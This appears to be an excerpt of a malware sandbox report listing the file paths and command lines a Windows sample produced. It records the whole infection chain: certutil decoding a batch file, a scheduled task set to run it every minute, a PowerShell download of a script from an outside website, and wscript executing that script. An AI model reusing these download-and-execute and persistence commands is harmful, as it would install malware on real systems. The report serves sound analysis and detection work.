Technical Information (file paths and process command lines recorded for the sample)
- <SYSTEM32>\tasks\xwvgebhnlg
- '<SYSTEM32>\certutil.exe' -f -decode 4W6EeuBg.bat 4W6EeuBg.bat
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 1 /tn XwvGEbHNLg /tr "%TEMP%\4W6EeuBg.bat"
- %TEMP%\4w6eeubg.bat
- <SYSTEM32>\tasks\xwvgebhnlg
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4W6EeuBg.bat" (with hidden window)
- '<SYSTEM32>\taskeng.exe' {6271D383-1A42-4AF2-BED4-9D2462288E09} S-1-5-21-3150914307-1777937420-491476919-1000:jqktlep\user:Interactive:[1]
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4W6EeuBg.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "IWR -UseBasicParsing 'https://entertainment-in-tenerife.com/wp-content/uploads/reader.php' -OutFile '%TEMP%\qCUg91dr.js'; schtasks /delete /f /tn XwvGEbHNLg; wscript %TEMP%\qCUg91dr.j...
- '<SYSTEM32>\schtasks.exe' /delete /f /tn XwvGEbHNLg
- '<SYSTEM32>\wscript.exe' %TEMP%\qCUg91dr.js